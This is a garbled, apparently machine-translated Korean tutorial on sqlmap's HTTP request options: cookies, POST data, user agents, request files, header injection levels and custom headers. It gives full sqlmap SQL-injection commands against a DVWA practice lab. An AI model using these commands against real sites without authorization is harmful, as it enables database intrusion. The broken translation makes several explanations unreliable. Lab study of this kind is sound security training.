HTTP 요청 매개 변수를 설정하는 SQLMaps
--cookie :하는 SQLMaps 대상 URL 스캔, 스캔하는 SQLMaps를 사용하는 경우 지정, 착륙 후 필요한 경우 대상 사이트의 URL에 액세스하려면, 당신은 과거와 함께 착륙 후 쿠키를 에이전트 로그인 상태 쿠키 정보가 필요 이 로그인 페이지로 리디렉션 될 수 있습니다, 또는이 인터페이스에 액세스 할 수있는 권한이 없습니다
--method : 지정 등 POST, GET, PUT, DELETE 등의 HTTP 요청에있어서,
--data :이 옵션이 지정된 경우 POST 요청이 매개 변수를 전달, 기본 모드는 POST 요청입니다
--param-델 : GET 또는 POST 설정하면 기본적 분리기, 및 디폴트 매개 변수 ","다음의 포맷 GET 파라미터
?id=1;name=张三
,
POST 요청 방법의 요구가 혼합 옵션에 의해 설정되는 --data
--data="id=1;name=张三"
--level : 보안 수준은 더에게 더 큰 값 (1-5, 기본 1) 깊이 스캔 테스트
매개 변수 테스트 할 : -p
URL을 검사하려면입니다 :
http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#
이드 만 스캔 파라미터들은, 복수의 필드는 -p 의해 지정된 콤마로 분리 할
sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=rpdbjcqpqmn0gin5uvsospbpvr; security=low" --dbs -p id
사용자 정의 사용자 에이전트
하는 SQLMaps 기본 사용자 에이전트는 다음과 같습니다
sqlmap/1.0-dev-xxxxxxx..
쉽게 식별 된 기본 사용자 에이전트 서버는 --user 에이전트에 의해 제공 될 수있다
sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --user-agent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.0"
사용자는 또한 개구 --random 에이전트를 제공함으로써, 임의로 생성 된 타겟 URL 사용자 에이전트를 통해 액세스 할 수있는
sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --random-agent
설치 디렉토리하는 SQLMaps 각 요청에서, --random 에이전트를 설정 한 후 데이터 / TXT / 사용자 agents.txt 무작위 완료하기 위해 사용자 에이전트 요청에서 선택을
주입 HTTP 요청 헤더 매개 변수로하는 SQLMaps
GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Host: test.dvwa.com
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://test.dvwa.com/vulnerabilities/sqli/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,cy;q=0.6,la;q=0.5
Cookie: PHPSESSID=rpdbjcqpqmn0gin5uvsospbpvr; security=low
쿠키가 주입 될 수있다. HTTP를 통해, 파일 헤더 정보를 저장하는 요청
sqlmap -r 文件名
HTTP 요청 헤더의 주입을 완료해야 쿠키 주입 될 경우,이 레벨 2 이상으로 설정해야합니다sqlmap -r 文件 --level=2
사용자 에이전트를 통해 주입하는 SQLMaps. 사용자 에이전트하는 SQLMaps 필요 요구를 주입 할 경우 레벨 3 이상으로 설정한다
sqlmap -r 文件 --level=3
호스트하는 SQLMaps 통해 주입. 최대 스캐닝 깊이 수준 설정을 요구하는 것은 5,5, HTTP 헤더 인 등 .. 쿠키, 사용자 에이전트, 참조 자 모든 검사 요청 매개 변수에
sqlmap -r 文件 --level=5
리퍼러를 주입하는하는 SQLMaps는 레벨 3 이상으로 설정해야합니다
sqlmap -r 文件 --level=3
HTTP 요청 헤더에 제공되는 추가 정보
제공함으로써 --headers 추가 헤더 정보를 지정하거나 정보 헤더를 기존의 수정, 다음 명령은 HTTP 헤더의 복수로 매개 변수를 사용자 에이전트 "단검"을 수정하고 "새 헤더"헤더 매개 변수를 추가합니다 "\ n"로 구분
sqlmap -r 文件 --headers="User-Agent: dagger\nNew Header: New Header Value"
-H --header 하나의 HTTP 헤더와 매개 변수를 지정 - 헤더의 복수를 지정할 수있는 매개 변수 HTTP 헤더를
또한 의해 제공 될 수있다 sqlmap.conf 낮은 프로파일 [요청]이 HTTP 요청 헤더의 구성 파라미터를 수정 한 후